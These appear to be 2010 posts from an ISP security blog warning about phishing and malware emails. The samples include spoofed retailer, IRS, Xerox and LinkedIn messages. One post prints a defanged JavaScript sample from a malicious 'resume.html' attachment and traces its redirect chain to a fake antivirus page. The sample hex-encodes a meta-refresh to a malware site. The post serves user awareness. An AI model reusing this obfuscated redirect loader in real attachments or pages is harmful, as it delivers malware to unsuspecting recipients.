Tuesday, August 24, 2010

New Egg Spam

UPDATE  2:45 pm
A new batch of these messages are coming through that appear identical to the earlier messages (that had apparently safe links) but now contain links to malicious sites.

Here is an image that shows the code containing "bad" links from the images on the new version.

Delete these messages if received. We have contacted Postini about this issue.

(Scroll down for details from the earlier post).





























Below is another "order confirmation" spam, this time spoofed from New Egg.

All the messages have the same customer name and account info.

While we can't detect any direct threat from most of the links, nevertheless the message should be treated as suspect and deleted.

IRS Notification Spam

Below is shown an example of a fraudulent message containing a malicious attachment.

There is no requirement from the IRS to install tax software on your computer.

These should be deleted without opening.

Monday, August 23, 2010

Celebrity Car Crash

Below is an example of a message that announces the death of a celebrity.  So far all the examples we have seen have a different celebrity name in the subject line than that in the body of the message.  This does add the element of humor to an otherwise annoying message.

Many of these have compressed attachments with names such as "CNN Hot News.zip"  The compressed file, in the examples we have checked, contains an executable file.

If you receive one of these messages, please delete it immediately.

Thursday, August 19, 2010

Xerox Workcenter Scan

Messages with a subject line of Scan from a Xerox WorkCentre Pro have been recently detected.  Many of these messages contain a compressed file attachment.  In the case of the files we have seen so far it is a malicious PDF file based on a new exploit.  Virustotal reports on this at their website.

From: "Brooks"
To:
Sent: Thursday, August 19, 2010 4:15 PM
Subject: Scan from a Xerox WorkCentre Pro $2223430


Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.


Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]


WorkCentre Pro Location: machine location not set
Device Name: XRX1443AA7ACDB49471539


For more information on Xerox products and solutions, please visit http://www.xerox.com

If you cannot verify the sender of such documents you should consider them potentially harmful.

Wednesday, August 18, 2010

Bad Resumes

This evening we started to notice a bunch of messages with "Resume" in the subject line and HTML attachments. The attachment was named "resume.html".  Makes sense to name it that when you're trying to deceive.

UPDATE:  Later versions of this message have an attachment named "CV.html".  Different file name, same threat.


These attachments contained not an HTML-formatted resume but a java script that made a call to an encoded URL.  And proceeded to try to do very bad things...

Please note in the examples below we have modified the content and website addresses to render them harmless to you.

These "resume.html" file attachments contained content like this:


[SCRIPT LANGUAGE="Javascript"]
[!--
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit()
{
x="%3C%6D%65%74%61%20%68%740
%2D%65%71%75%6 22%72%65%66%72
%65%73%68%22%20%63%6F%6E%74
%65%6E%74%3D%22%30%%72%6C%
3D%4%70%3A%2F%2F%77%69%6D%
62%65%72%74%2E%6E%6C%2F%78%
2E%68%74%6D%6C%20D%0A"
xhtmldecode(x)
}
runit()
//--]


[/script]

Encoding is a means of modifying the URL to perform actions on it. Along with modifying the URL by converting it to hexadecimal or octal characters, a website can be "obfuscated" -- written in a manner as %68%74%74%70%3a%2f%2f%74%65%63%68%62%6c%6f%67%2e%61%64%61%6d%73%2e%6e%65%74
making it nearly impossible for a human to ascertain the actual address.  But the web browser knows how to convert that string of characters into the proper web address.

When "decoded" the script was actually directing the web browser to a website in the Netherlands:


[SCRIPT LANGUAGE="Javascript"][!--
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x="[meta http-equiv="refresh" 
content="0;url=http://wi88888rt.nl/x.html"]
"
xhtmldecode(x)
}
runit()
//--]
[/script]

This told the browser to immediately get redirected to the web page "x.html" at that website. That page then loaded a window that would then direct to yet another page that started the malicious activity prompting the user to "install a missing plugin" but then loading harmful content at the same time.


   PLEASE WAITING 4 SECOND...
   REFRESH(4 sec): http://brocu88888slock.cz.cc/scanner10/?afid=24


   IFRAME: http://hig88888ce.in/stat/?up=image&page=151&done=disabled&account=ecard&next=param


Then the page would display "Windows Online Scanner" and begin to install malicious software on a PC that was not properly protected against such threats.


                       My Windows Online Scanner


   [loading.gif]             
   Initializing Virus Protection System...


The moral here is quite simple -- never attempt to open any file attachment unless you have first fully verified the authenticity of the sender and then only after doing a scan of the file with anti-virus software that has been updated to the most current definitions.

More information on the Java exploit used in this attack can be found on Microsoft's security website.

LDS.ORG LISTSERV

It appears that there is some sort of spam that is being sent to a mailing list server that is generating "bounce" messages similar to this:
Date: Wed, 18 Aug 2010 16:23:04 +0600
From: "LDS.ORG LISTSERV Server (14.3)" LISTSERV@LISTS.LDS.ORG
To: someuser@adams.net
Subject: Re: LDS.org Webpage Subscribe

> SUBSCRIBE news UNLUKY
The NEWS list is unknown to LISTSERV@LISTS.LDS.ORG.

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec               
 Device I/O:        5
 Overhead CPU:    0.000 sec
 CPU model:         3GHz Dual-Core Opteron 2222 (2048M)
 Job origin:     someuser@adams.net
This may be a case of a deliberate attack on the LDS mailing list using "spoofed" email addresses as the sender.  The attacker forges the email addresses of the senders who then are the "unlucky" recipients of the error message.

Unfortunately there is no way to prevent email address spoofing, so these messages are very difficult to avoid.  Just hit the "delete" key...

Tuesday, August 17, 2010

LinkedIn Spoofs

Below are some examples of spoofed LinkedIn messages that contain links to malicious sites (as seen in the yellow 'call-out').

The popularity of social networking sites has made these type of messages more attractive (and sadly, more effective) to the spammer.